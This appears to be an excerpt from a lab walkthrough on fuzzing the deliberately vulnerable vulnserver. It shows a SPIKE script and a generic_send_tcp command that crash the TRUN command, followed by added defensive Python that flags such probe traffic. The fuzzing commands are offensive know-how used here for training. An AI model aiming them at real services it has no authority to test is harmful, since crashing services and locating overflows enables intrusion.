Step 0: Spiking (Optional)

generic_send_tcp

Note that vulnserver has many commands available:

In order to figure out which commands are vulnerable, we use generic_send_tcp to "spike" the executable and look for crashes:

generic_send_tcp <ip> <port> <spike_script> <SKIPVAR=0> <SKIPSTR=0>

Suppose we want to spike the TRUN command. The spike script is then:

trun.spk
s_readline();
s_string("TRUN ");
s_string_variable("0");

Run vulnserver by pressing F9 in Immunity Debugger. From our Linux attack machine, spike it:

generic_send_tcp 192.168.1.2 9999 trun.spk 0 0

Immediately, the executable crashes. This confirms that the TRUN command has a buffer overflow (BoF) vulnerability:
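As an added example that is not part of the original walkthrough (nor of vulnserver or SPIKE), the following Python looks at the same traffic from the defender's side: it parses the line-oriented `COMMAND argument` format the spike targets and flags TRUN messages with the traits a run of trun.spk produces, an oversized argument or non-printable bytes. The length threshold and the sample messages are constructed assumptions, not values from the page.

```python
"""Defender-side check for vulnserver traffic that resembles a TRUN spike.
Added example, not part of the original walkthrough, vulnserver or SPIKE.
Assumptions: the protocol is line-oriented "<COMMAND> <argument>\r\n";
MAX_ARG_LEN is a constructed threshold; SAMPLES are constructed messages.
"""
from dataclasses import dataclass

MAX_ARG_LEN = 512              # assumed policy: longer arguments are suspicious
MONITORED_COMMANDS = {"TRUN"}  # the command the write-up shows crashing


@dataclass
class Finding:
    command: str
    arg_len: int
    reason: str


def parse_command(payload: bytes):
    """Split the first line into (COMMAND, argument); (None, b"") if malformed."""
    line = payload.split(b"\n", 1)[0].rstrip(b"\r")
    cmd, _, arg = line.partition(b" ")
    if not cmd or not cmd.isalpha():
        return None, b""
    return cmd.decode("ascii").upper(), arg


def inspect(payload: bytes):
    """Return a Finding if the message looks like an overflow probe, else None."""
    cmd, arg = parse_command(payload)
    if cmd is None:
        return None
    # Trait 1: an argument far longer than any command legitimately needs.
    if len(arg) > MAX_ARG_LEN:
        return Finding(cmd, len(arg), f"argument exceeds {MAX_ARG_LEN} bytes")
    # Trait 2: binary content in a command that is expected to carry text.
    if cmd in MONITORED_COMMANDS and any(not 0x20 <= b <= 0x7E for b in arg):
        return Finding(cmd, len(arg), "non-printable bytes in argument")
    return None


# Constructed sample messages (not captured traffic).
SAMPLES = [
    b"TRUN hello\r\n",                  # benign text argument
    b"TRUN " + b"A" * 2000 + b"\r\n",   # long s_string_variable()-style string
    b"TRUN " + b"\x90" * 64 + b"\r\n",  # short but binary argument
]


def scan(samples=SAMPLES):
    """Findings for a batch of messages, None results dropped."""
    return [f for f in map(inspect, samples) if f is not None]
```

Running `scan()` on the constructed samples reports the second and third message and leaves the benign one alone; in practice the same two checks map onto a payload-length and content rule on the vulnserver port.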
